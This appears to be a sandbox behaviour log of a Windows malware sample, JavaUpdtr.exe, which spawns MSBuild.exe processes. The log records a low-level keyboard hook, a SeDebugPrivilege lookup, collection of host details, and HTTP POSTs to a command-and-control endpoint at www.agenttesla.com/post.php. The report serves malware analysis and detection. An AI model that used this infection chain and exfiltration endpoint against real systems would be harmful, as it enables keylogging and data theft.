Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Thread 0x6e4
1 0
»
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe True 1
Fn
Process #8: msbuild.exe
0 0
»
Information Value
ID #8
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x708
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 70C
Process #9: msbuild.exe
182 48
»
Information Value
ID #9
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration 00:00:29
OS Process Information
»
Information Value
PID 0x718
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 71C
0x 728
0x 72C
0x 7B8
0x 7C4
0x 7C8
0x 7CC
0x 5FC
0x 670
0x 674
0x 650
0x 4EC
0x 4E8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005B0000 0x005B0FFF First Execution - 32-bit 0x005B0C1C, 0x005B09C4, ... False False
...
Threads
Thread 0x71c
125 48
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config, type = file_attributes True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x75db0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x75dbca24 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductId, type = REG_NONE False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75a40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77af25dd True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 2007967197 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 13112074 True 1
Fn
System Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0xc8162a True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 237 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 559 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 9
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
System Get Network Adapter Info - False 1
Fn
System Get Network Adapter Info - True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Thread 0x5fc
5 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Thread 0x670
52 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
